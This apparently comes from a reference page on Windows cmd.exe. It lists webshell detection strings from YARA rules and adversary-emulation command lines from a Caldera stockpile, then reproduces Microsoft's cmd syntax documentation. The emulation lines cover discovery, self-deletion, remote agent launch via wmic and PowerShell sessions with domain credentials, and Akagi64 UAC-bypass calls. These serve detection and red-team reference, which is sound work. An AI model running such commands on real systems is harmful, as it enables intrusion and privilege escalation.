| signature-base | thor-webshells.yar | $s3 = “Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)” fullword | CC BY-NC 4.0 |
| signature-base | thor-webshells.yar | $s9 = “Call oS.Run("win.com cmd.exe /c """ & szCMD & " > " & szTF &” fullword | CC BY-NC 4.0 |
| signature-base | thor-webshells.yar | $s0 = “Process p = Runtime.getRuntime().exec("cmd.exe /c " + request.getParam” | CC BY-NC 4.0 |
| signature-base | thor-webshells.yar | $s0 = “Process p = Runtime.getRuntime().exec("cmd.exe /C " + cmd);” fullword | CC BY-NC 4.0 |
| signature-base | thor-webshells.yar | $s7 = “Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)” fullword | CC BY-NC 4.0 |
| signature-base | thor-webshells.yar | $s7 = “Unix:/bin/sh -c tar vxf xxx.tar Windows:c:\winnt\system32\cmd.exe /c type c:” | CC BY-NC 4.0 |
| signature-base | thor-webshells.yar | $s0 = “Call oS.Run("win.com cmd.exe /c del "& szTF,0,True)” fullword | CC BY-NC 4.0 |
| signature-base | thor-webshells.yar | $s3 = “Call oS.Run("win.com cmd.exe /c """ & szCMD & " > " & szTF &” fullword | CC BY-NC 4.0 |
| signature-base | thor-webshells.yar | $s0 = “// note that linux = cmd and windows = "cmd.exe /c + cmd" “ fullword | CC BY-NC 4.0 |
| signature-base | thor-webshells.yar | $s1 = “Process p = Runtime.getRuntime().exec("cmd.exe /C " + cmd);” fullword | CC BY-NC 4.0 |
| signature-base | thor-webshells.yar | $s14 = “Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)” fullword | CC BY-NC 4.0 |
| signature-base | thor-webshells.yar | $s6 = “Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)” | CC BY-NC 4.0 |
| signature-base | thor-webshells.yar | $s1 = “Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)” | CC BY-NC 4.0 |
| signature-base | thor-webshells.yar | $s1 = “.StartInfo.FileName = ‘cmd.exe’;” ascii fullword | CC BY-NC 4.0 |
| stockpile | 55678719-e76e-4df9-92aa-10655bbd1cf4.yml | name: cmd.exe information gathering |
Apache-2.0 |
| stockpile | 55678719-e76e-4df9-92aa-10655bbd1cf4.yml | cmd.exe /c "net user" >> C:\Windows\temp\history.log; |
Apache-2.0 |
| stockpile | 55678719-e76e-4df9-92aa-10655bbd1cf4.yml | cmd.exe /c "whoami /priv" >> C:\Windows\temp\history.log; |
Apache-2.0 |
| stockpile | 55678719-e76e-4df9-92aa-10655bbd1cf4.yml | cmd.exe /c "netstat -ano" >> C:\Windows\temp\history.log; |
Apache-2.0 |
| stockpile | 5f844ac9-5f24-4196-a70d-17f0bd44a934.yml | Commandline = 'cmd.exe /c "timeout /nobreak /t 10 >nul 2>nul & del /f #{location}"'; |
Apache-2.0 |
| stockpile | ece5dde3-d370-4c20-b213-a1f424aa8d03.yml | wmic /node:”#{remote.host.fqdn}" /user:”#{domain.user.name}" /password:”#{domain.user.password}" process call create "cmd.exe C:\Users\Public\s4ndc4t.exe -server #{server} -group #{group}"; |
Apache-2.0 |
| stockpile | 41bb2b7a-75af-49fd-bd15-6c827df25921.yml | Invoke-Command -Session $session -ScriptBlock{start-job -scriptblock{cmd.exe /c start C:\Users\Public\svchost.exe -server #{server} } }; |
Apache-2.0 |
| stockpile | 95ad5d69-563e-477b-802b-4855bfb3be09.yml | .\Akagi64.exe 30 C:\Windows\System32\cmd.exe |
Apache-2.0 |
| stockpile | b7344901-0b02-4ead-baf6-e3f629ed545f.yml | .\Akagi64.exe 45 C:\Windows\System32\cmd.exe |
Apache-2.0 |
Additional Info*
*The information below is copied from MicrosoftDocs, which is maintained by Microsoft. Available under CC BY 4.0 license.
cmd
Starts a new instance of the command interpreter, Cmd.exe. If used without parameters, cmd displays the version and copyright information of the operating system.
Syntax
cmd [/c|/k] [/s] [/q] [/d] [/a|/u] [/t:{<b><f> | <f>}] [/e:{on | off}] [/f:{on | off}] [/v:{on | off}] [<string>]
Parameters
| Parameter | Description |
|---|---|
| /c | Carries out the command specified by string and then stops. |
| /k | Carries out the command specified by string and continues. |
| /s | Modifies the treatment of string after /c or /k. |
| /q | Turns the echo off. |
| /d | Disables execution of AutoRun commands. |
| /a | Formats internal command output to a pipe or a file as American National Standards Institute (ANSI). |
| /u | Formats internal command output to a pipe or a file as Unicode. |
/t:{<b><f> | <f>} |
Sets the background (b) and foreground (f) colors. |
| /e:on | Enables command extensions. |
| /e:off | Disables commands extensions. |
| /f:on | Enables file and directory name completion. |
| /f:off | Disables file and directory name completion. |
| /v:on | Enables delayed environment variable expansion. |
| /v:off | Disables delayed environment variable expansion. |
<string> |
Specifies the command you want to carry out. |
| /? | Displays help at the command prompt. |
The following table lists valid hexadecimal digits that you can use as the values for <b> and <f>:
| Value | Color |
|---|---|
| 0 | Black |
| 1 | Blue |
| 2 | Green |
| 3 | Aqua |
| 4 | Red |
| 5 | Purple |
| 6 | Yellow |
| 7 | White |
| 8 | Gray |
| 9 | Light blue |
| a | Light green |
| b | Light aqua |
| c | Light red |
| d | Light purple |
| e | Light yellow |
| f | Bright white |
Remarks
-
To use multiple commands for
<string>, separate them by the command separator && and enclose them in quotation marks. For example:"<command1>&&<command2>&&<command3>" -
If you specify /c or /k, cmd processes, the remainder of string, and the quotation marks are preserved only if all of the following conditions are met:
-
You don’t also use /s.
-
You use exactly one set of quotation marks.
-
You don’t use any special characters within the quotation marks (for example: & < > ( ) @ ^ ). -
You use one or more white-space characters within the quotation marks.
- The string within quotation marks is the name of an executable file.
If the previous conditions aren’t met, string is processed by examining the first character to verify whether it is an opening quotation mark. If the first character is an opening quotation mark, it is stripped along with the closing quotation mark. Any text following the closing quotation marks is preserved.
-
-
If you don’t specify /d in string, Cmd.exe looks for the following registry subkeys:
-
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\AutoRun\REG_SZ
-
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun\REG_EXPAND_SZ
If one or both registry subkeys are present, they’re executed before all other variables.
[!CAUTION] Incorrectly editing the registry may severely damage your system. Before making changes to the registry, you should back up any valued data on the computer.
-
-
You can disable command extensions for a particular process by using /e:off. You can enable or disable extensions for all cmd command-line options on a computer or user session by setting the following REG_DWORD values:
-
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\EnableExtensions\REG_DWORD
-
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\EnableExtensions\REG_DWORD
Set the REG_DWORD value to either 0×1 (enabled) or 0×0 (disabled) in the registry by using Regedit.exe. User-specified settings take precedence over computer settings, and command-line options take precedence over registry settings.
[!CAUTION] Incorrectly editing the registry may severely damage your system. Before making changes to the registry, you should back up any valued data on the computer.
When you enable command extensions, the following commands are affected:
-
assoc
-
call
-
chdir (cd)
-
color
-
del (erase)
-
endlocal
-
for
-
ftype
-
goto
-
if
-
mkdir (md)
-
popd
-
prompt
-
pushd
-
set
-
setlocal
-
shift
-
start (also includes changes to external command processes)
-
-
If you enable delayed environment variable expansion, you can use the exclamation point character to substitute the value of an environment variable at run time.
-
File and directory name completion is not enabled by default. You can enable or disable file name completion for a particular process of the cmd command with /f:{on off}. You can enable or disable file and directory name completion for all processes of the cmd command on a computer or for a user logon session by setting the following REG_DWORD values: -
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\CompletionChar\REG_DWORD
-
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\PathCompletionChar\REG_DWORD
-
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\CompletionChar\REG_DWORD
-
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\PathCompletionChar\REG_DWORD
To set the REG_DWORD value, run Regedit.exe and use the hexadecimal value of a control character for a particular function (for example, 0×9 is TAB and 0×08 is BACKSPACE). User-specified settings take precedence over computer settings, and command-line options take precedence over registry settings.
[!CAUTION] Incorrectly editing the registry may severely damage your system. Before making changes to the registry, you should back up any valued data on the computer.
-
-
If you enable file and directory name completion by using /f:on, use CTRL+D for directory name completion and CTRL+F for file name completion. To disable a particular completion character in the registry, use the value for white space [0×20] because it is not a valid control character.
-
Pressing CTRL+D or CTRL+F, processes the file and directory name completion. These key combination functions append a wildcard character to string (if one is not present), builds a list of paths that match, and then displays the first matching path.<p>If none of the paths match, the file and directory name completion function beeps and does not change the display. To move through the list of matching paths, press CTRL+D or CTRL+F repeatedly. To move through the list backwards, press the SHIFT key and CTRL+D or CTRL+F simultaneously. To discard the saved list of matching paths and generate a new list, edit string and press CTRL+D or CTRL+F. If you switch between CTRL+D and CTRL+F, the saved list of matching paths is discarded and a new list is generated. The only difference between the key combinations CTRL+D and CTRL+F is that CTRL+D only matches directory names and CTRL+F matches both file and directory names. If you use file and directory name completion on any of the built-in directory commands (that is, CD, MD, or RD), directory completion is assumed.
-
File and directory name completion correctly processes file names that contain white space or special characters if you place quotation marks around the matching path.
-
You must use quotation marks around the following special characters: & < > [ ] { } ^ = ; ! ‘ + , ` ~ [white space]. -
If the information that you supply contains spaces, you must use quotation marks around the text (for example, “Computer Name”).
- If you process file and directory name completion from within string, any part of the path to the right of the cursor is discarded (at the point in string where the completion was processed).
-
Additional References
MIT License. Copyright (c) 2020-2021 Strontic.